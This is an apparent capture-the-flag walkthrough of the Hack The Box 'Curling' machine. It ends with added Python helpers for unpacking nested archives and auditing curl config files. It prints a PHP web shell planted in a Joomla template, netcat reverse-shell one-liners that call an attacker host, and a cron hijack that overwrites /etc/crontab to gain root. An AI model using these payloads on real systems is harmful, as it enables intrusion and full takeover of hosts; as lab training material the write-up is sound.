Hack The Box - Curling
SYNOPSIS
Curling is an easy-difficulty Linux machine that requires a good deal of enumeration. A password is stored in a file in the web root, and a username can be enumerated from a post on the CMS, which together allow logging in. Editing a PHP template gives a reverse shell. A hex dump is found; reversing and decompressing it yields a user's password. Enumerating running processes reveals a cron job that can be abused to obtain root.
Skills Required
Enumeration
Skills Learned
Analyzing hex dumps
Curl usage
Enumeration
Port Scan
$ masscan -p1-65535 --rate=1000 -e tun0 $target
Discovered open port 22/tcp on 10.129.105.207
Discovered open port 80/tcp on 10.129.105.207
$ nmap -sC -sV -p22,80 -v $target
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap script
$ nmap -p 80 --script safe $target -v $target
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 12:21 BST
NSE: Loaded 346 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:21
NSE: [mtrace] not running for lack of privileges.
NSE: [broadcast-pppoe-discover] not running for lack of privileges.
NSE: [broadcast-ataoe-discover] No interface supplied, use -e
NSE: [url-snarf] not running for lack of privileges.
NSE: [broadcast-eigrp-discovery] not running for lack of privileges.
NSE: [broadcast-igmp-discovery] not running due to lack of privileges.
NSE: [broadcast-pim-discovery] not running for lack of privileges.
NSE: [shodan-api] Error: Please specify your ShodanAPI key with the shodan-api.apikey argument
NSE: [mrinfo] not running for lack of privileges.
NSE: [llmnr-resolve] not running due to lack of privileges.
NSE: [knx-gateway-discover] Not running due to lack of privileges.
NSE: not running for lack of privileges.
NSE: [broadcast-dhcp6-discover] not running for lack of privileges.
NSE: [lltd-discovery] not running for lack of privileges.
NSE: [broadcast-sonicwall-discover] Not running for lack of privileges.
NSE: [broadcast-dhcp-discover] not running for lack of privileges.
NSE: [targets-xml] Need to supply a file name with the targets-xml.iX argument
NSE: [broadcast-ping] not running for lack of privileges.
NSE: [broadcast-listener] not running for lack of privileges.
Completed NSE at 12:22, 40.02s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Pre-scan script results:
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Initiating Ping Scan at 12:22
Scanning 2 hosts [2 ports/host]
Completed Ping Scan at 12:22, 0.02s elapsed (2 total hosts)
Initiating Parallel DNS resolution of 2 hosts. at 12:22
Completed Parallel DNS resolution of 2 hosts. at 12:22, 0.01s elapsed
Initiating Connect Scan at 12:22
Scanning 2 hosts [1 port/host]
Discovered open port 80/tcp on 10.129.105.207
Discovered open port 80/tcp on 10.129.105.207
Completed Connect Scan at 12:22, 0.00s elapsed (2 total ports)
NSE: Script scanning 2 hosts.
Initiating NSE at 12:22
NSE: [path-mtu] not running for lack of privileges.
NSE: [ipidseq] not running for lack of privileges.
NSE: [firewalk] not running for lack of privileges.
NSE: [qscan] not running for lack of privileges.
NSE: [tls-ticketbleed] Not running due to lack of privileges.
Completed NSE at 12:22, 22.59s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Nmap scan report for 10.129.105.207
Host is up (0.015s latency).
PORT STATE SERVICE
80/tcp open http
| http-backup-finder:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
| http://10.129.105.207:80/index.php/2-uncategorised/index.bak
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
| http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
| http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
|_ http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-xssed: No previously reported XSS vuln.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 250
| http-traceroute:
|_ Possible reverse proxy detected.
|_http-referer-checker: Couldn't find any cross-domain scripts.
| http-grep:
| (1) http://10.129.105.207:80/:
| (1) ip:
|_ + 10.129.105.207
| http-headers:
| Date: Mon, 10 Oct 2022 11:22:19 GMT
| Server: Apache/2.4.29 (Ubuntu)
| Set-Cookie: c0548020854924e0aecd05ed9f5b672b=hc0lipau9p6ra5ne1u0i75f8r8; path=/; HttpOnly
| Expires: Wed, 17 Aug 2005 00:00:00 GMT
| Last-Modified: Mon, 10 Oct 2022 11:22:19 GMT
| Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| Pragma: no-cache
| Connection: close
| Content-Type: text/html; charset=utf-8
|
|_ (Request type: HEAD)
|_http-mobileversion-checker: No mobile version detected.
| http-auth-finder:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
| url method
| http://10.129.105.207:80/ FORM
| http://10.129.105.207:80/index.php/component/users/?view=reset&Itemid=101 FORM
| http://10.129.105.207:80/index.php/2-uncategorised/1-first-post-of-curling2018 FORM
| http://10.129.105.207:80/index.php FORM
| http://10.129.105.207:80/index.php/2-uncategorised/2-curling-you-know-its-true FORM
| http://10.129.105.207:80/index.php/component/users/?view=remind&Itemid=101 FORM
|_ http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling FORM
|_http-title: Home
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|
| Path: http://10.129.105.207:80/media/jui/js/bootstrap.min.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /*!
| * Bootstrap.js by @fat & @mdo
| * Copyright 2012 Twitter, Inc.
| * http://www.apache.org/licenses/LICENSE-2.0.txt
| *
| * Custom version for Joomla!
| */
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 213
| Comment:
| <!-- End Right Sidebar -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 161
| Comment:
| <!-- Begin Right Sidebar -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 42
| Comment:
| <!-- Header -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 39
| Comment:
| <!-- Body -->
|
| Path: http://10.129.105.207:80/templates/protostar/js/template.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /**
| * @package Joomla.Site
| * @subpackage Templates.protostar
| * @copyright Copyright (C) 2005 - 2018 Open Source Matters, Inc. All rights reserved.
| * @license GNU General Public License version 2 or later; see LICENSE.txt
| * @since 3.2
| */
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 27
| Comment:
| <!--[if lt IE 9]><script src="/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|
| Path: http://10.129.105.207:80/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /**
| * @preserve HTML5 Shiv 3.7.3 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed
| */
|
| Path: http://10.129.105.207:80/index.php?format=feed&type=rss
| Line number: 2
| Comment:
| <!-- generator="Joomla! - Open Source Content Management" -->
|
| Path: http://10.129.105.207:80/media/system/js/caption.js?b6bf078482bc6a711b54fa9e74e19603
| Line number: 1
| Comment:
| /*
| GNU General Public License version 2 or later; see LICENSE.txt
| */
|
| Path: http://10.129.105.207:80/index.php/component/users/?view=remind&Itemid=101
| Line number: 29
| Comment:
| <!--[if lt IE 9]><script src="/media/system/js/html5fallback.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 233
| Comment:
| <!-- secret.txt -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 218
| Comment:
| <!-- Footer -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 55
| Comment:
| <!-- Begin Content -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 158
| Comment:
| <!-- End Content -->
|
| Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
| Line number: 29
| Comment:
|_ <!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
| http-security-headers:
| Cache_Control:
| Header: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| Pragma:
| Header: Pragma: no-cache
| Expires:
|_ Header: Expires: Wed, 17 Aug 2005 00:00:00 GMT
|_http-date: Mon, 10 Oct 2022 11:22:18 GMT; +1h00m01s from local time.
|_http-malware-host: Host appears to be clean
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-generator: Joomla! - Open Source Content Management
Host script results:
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)
| port-states:
| tcp:
|_ open: 80
| dns-blacklist:
| SPAM
| list.quorum.to - FAIL
|_ l2.apews.org - FAIL
|_clock-skew: 1h00m00s
|_fcrdns: FAIL (No PTR record)
NSE: Script Post-scanning.
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Post-scan script results:
| reverse-index:
|_ 80/tcp: 10.129.105.207, 10.129.105.207
Read data files from: /usr/bin/../share/nmap
Nmap done: 2 IP addresses (2 hosts up) scanned in 63.92 seconds
$ searchsploit Apache 2.4.29
<SNIP>
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | multiple/webapps/50383.sh
The home page HTML source contains a secret.txt comment; view it with:
view-source:http://10.129.106.27/
$ curl -s http://$target/secret.txt | base64 -d
Curling2018!
Go to http://10.129.106.27/administrator and log in as user Floris with password Curling2018!
Foothold
Web
A curling website hosted on Joomla CMS. The posts are written by Super User, and one of them is signed Floris.
The home page HTML source contains a comment:
<SNIP>
</body>
<!-- secret.txt -->
</html>
Visiting it returns a base64-encoded string; decoding it yields the site's admin password:
$ echo 'Q3VybGluZzIwMTgh' | base64 -d
Curling2018!
Searching for Joomla CMS documentation shows that the admin panel path is /administrator; log in there as floris.
Getting a www-data shell
Look for a place to write PHP code: go to Extensions -> Templates, create or pick a PHP file, write a PHP shell into it and save.
<?php system($_REQUEST['pwn']); ?>
Request the page to test the shell, then use it to obtain a reverse shell: http://10.129.106.116/templates/beez3/dark.php?pwn=id
$ curl http://10.129.106.116/templates/beez3/dark.php -G --data-urlencode 'pwn=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f '
$ rlwrap nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.106.116.
Ncat: Connection from 10.129.106.116:42390.
/bin/sh: 0: can not access tty; job control turned off
whoami
www-data
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@curling:/var/www/html/templates/beez3$ ll
LATERAL MOVEMENT
HEX DUMP
Navigating to /home/floris, a file named password_backup is found
$ cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
<SNIP>
$ cp password_backup /tmp && cat /tmp/password_backup | xxd -r > /tmp/bak
$ file bak
bak: bzip2 compressed data, block size = 900k
The file has been compressed several times; decompress it layer by layer:
$ bzip2 -d bak
bzip2: Can not guess original name for bak -- using bak.out
$ file bak.out
bak.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix
$ mv bak.out bak.gz
$ gzip -d bak.gz
$ file bak
bak: bzip2 compressed data, block size = 900k
$ bzip2 -d bak
bzip2: Can not guess original name for bak -- using bak.out
$ file bak.out
bak.out: POSIX tar archive (GNU)
$ tar xf bak.out
$ cat password.txt
5d<wdCbdZu)|hChXll # floris's SSH password
$ ssh floris@10.129.106.116
Last login: Wed Sep 8 11:42:07 2021 from 10.10.14.15
floris@curling:~$ whoami
floris
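The layer-by-layer unwrapping above can be automated. The following script is an added example, not part of the original writeup: it reverses an xxd dump like password_backup, identifies each layer by its magic bytes (the same signal `file` uses) and peels bzip2, gzip and tar until raw data remains. The dump it consumes is constructed in the script from a placeholder secret rather than taken from the box.

```python
import bz2
import gzip
import io
import re
import tarfile

# Magic bytes of the container formats that `file` reported in the walkthrough.
BZIP2_MAGIC = b"BZh"
GZIP_MAGIC = b"\x1f\x8b"
TAR_USTAR = b"ustar"  # sits at offset 257 of a POSIX/GNU tar header


def xxd_to_bytes(dump, cols=16):
    """Reverse an `xxd` dump (offset: hex groups  ASCII) into raw bytes, like `xxd -r`."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        rest = line.partition(":")[2].strip()
        # The ASCII column follows 2+ spaces; if extraction collapsed the whitespace,
        # the per-line byte count still stops us before the ASCII column.
        hex_area = re.split(r"\s{2,}", rest, maxsplit=1)[0]
        n = 0
        for tok in hex_area.split():
            if n >= cols or len(tok) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", tok):
                break
            out += bytes.fromhex(tok)
            n += len(tok) // 2
    return bytes(out)


def bytes_to_xxd(data, cols=16):
    # Render bytes in xxd's default layout; only used to build the sample dump.
    lines = []
    for off in range(0, len(data), cols):
        chunk = data[off:off + cols]
        hexs = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexs:<39}  {asc}")
    return "\n".join(lines)


def identify(blob):
    """Classify a blob by its magic bytes."""
    if blob.startswith(BZIP2_MAGIC):
        return "bzip2"
    if blob.startswith(GZIP_MAGIC):
        return "gzip"
    if len(blob) > 262 and blob[257:262] == TAR_USTAR:
        return "tar"
    return "raw"


def unwrap(blob, max_layers=16):
    """Peel bzip2/gzip/tar layers; returns (layers in order, payload, tar member name)."""
    layers, member_name = [], None
    for _ in range(max_layers):
        kind = identify(blob)
        if kind == "bzip2":
            blob = bz2.decompress(blob)
        elif kind == "gzip":
            blob = gzip.decompress(blob)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(blob)) as tf:
                member = next(m for m in tf.getmembers() if m.isfile())
                member_name = member.name
                blob = tf.extractfile(member).read()
        else:
            return layers, blob, member_name
        layers.append(kind)
    raise ValueError("more than %d nested layers; refusing to continue" % max_layers)


def build_sample_dump(secret):
    """Constructed sample: nest `secret` the way the box did (tar, bzip2, gzip, bzip2)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))
    return bytes_to_xxd(blob)


if __name__ == "__main__":
    dump = build_sample_dump(b"example-password\n")  # constructed, not the box's secret
    layers, payload, name = unwrap(xxd_to_bytes(dump))
    print("layers:", " -> ".join(layers), "| member:", name, "| payload:", payload)
```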
Privilege Escalation
Enumeration
Use pspy: download the smaller binary and transfer it to the box
$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy64s
$ scp pspy64s floris@10.129.106.116:/tmp
$ cd /tmp
$ chmod +x pspy64s
$ ./pspy64s
/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2022/10/14 10:50:01 CMD: UID=0 PID=2664 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2022/10/14 10:50:01 CMD: UID=0 PID=2663 | /usr/sbin/CRON -f
2022/10/14 10:50:01 CMD: UID=0 PID=2662 | /usr/sbin/CRON -f
2022/10/14 10:50:01 CMD: UID=0 PID=2667 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
A cron job is running. The curl -K option specifies a config file: the cron job uses input as the configuration and writes the result to report.
$ cat /home/floris/admin-area/input
url = "http://127.0.0.1"
$ ls -la /home/floris/admin-area/input
-rw-rw---- 1 root floris 25 Oct 14 11:00 /home/floris/admin-area/input
The input file is group-owned by floris, so we can write our own configuration; the output directive chooses the file curl writes to. Create a malicious crontab and overwrite input.
Setting up the configuration
First create the malicious crontab file on the local machine and start a simple HTTP server
$ cp /etc/crontab .
$ echo '* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f ' >> crontab
$ python3 -m http.server 80
As floris, edit the input file so that url points to the crontab file on the local machine
url = "http://10.10.14.20/crontab"
output = "/etc/crontab"
Start a listener, cat the input file to confirm what curl will read, and wait for the shell to call back
$ nc -lvp 1234
$ cat input
Root obtained:
```shell
$ nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.106.157.
Ncat: Connection from 10.129.106.157:36182.
/bin/sh: 0: can not access tty; job control turned off
whoami
root
```
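From the defender's side, the weakness this cron job relies on is a root process reading a curl -K config that a non-root group can rewrite. As an added example (not from the original writeup), the script below parses curl's config syntax and flags a group- or world-writable config, an output directive aimed at a system directory, and a plaintext fetch from a non-loopback host; the two sample configs and the temp-file permissions are constructed.

```python
import os
import re
import stat
import tempfile

# Locations a privileged cron job should never be steered into writing by a config it does not fully own.
SENSITIVE_DIRS = ("/etc", "/root", "/usr", "/bin", "/sbin", "/lib", "/var/spool/cron")
# curl options that choose where the response body is written.
OUTPUT_OPTIONS = {"output", "o", "remote-name", "O"}

# Constructed samples: the benign config the box's cron job expected, and the overwritten one.
BENIGN_CONFIG = 'url = "http://127.0.0.1"\n'
HIJACKED_CONFIG = 'url = "http://10.10.14.20/crontab"\noutput = "/etc/crontab"\n'


def parse_curl_config(text):
    """Parse curl's -K file: one option per line as `name = "value"`, `name: value`,
    `--name value`, `-x value` or a bare flag; `#` begins a comment."""
    options = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^-{0,2}([A-Za-z][\w-]*)\s*[=:]?\s*(.*)$", line)
        if not m:
            continue
        name, value = m.group(1), m.group(2).strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        options.append((name, value))
    return options


def audit_curl_config(path):
    """Return findings for a curl config that a root cron job passes to `curl -K`."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & stat.S_IWGRP:
        findings.append("config is group-writable: a group member controls what root fetches and where it lands")
    if mode & stat.S_IWOTH:
        findings.append("config is world-writable")
    with open(path) as fh:
        options = parse_curl_config(fh.read())
    for name, value in options:
        if name == "url" and value.startswith("http://") and not value.startswith(("http://127.", "http://localhost")):
            findings.append(f"fetches {value} over plaintext HTTP from a non-loopback host")
        if name in OUTPUT_OPTIONS:
            target = os.path.normpath(value or "")
            if any(target == d or target.startswith(d + os.sep) for d in SENSITIVE_DIRS):
                findings.append(f"{name} directive writes the response into a system path: {target}")
    return findings


def write_sample_config(text, mode):
    """Write a constructed config to a temp file with the given permission bits; returns its path."""
    fd, path = tempfile.mkstemp(prefix="curl-input-")
    with os.fdopen(fd, "w") as fh:
        fh.write(text)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    # 0o640 is the benign file with group write removed; 0o660 mirrors the -rw-rw---- seen on the box.
    for label, text, mode in (("benign", BENIGN_CONFIG, 0o640), ("hijacked", HIJACKED_CONFIG, 0o660)):
        path = write_sample_config(text, mode)
        print(label, audit_curl_config(path) or ["no findings"])
        os.unlink(path)
```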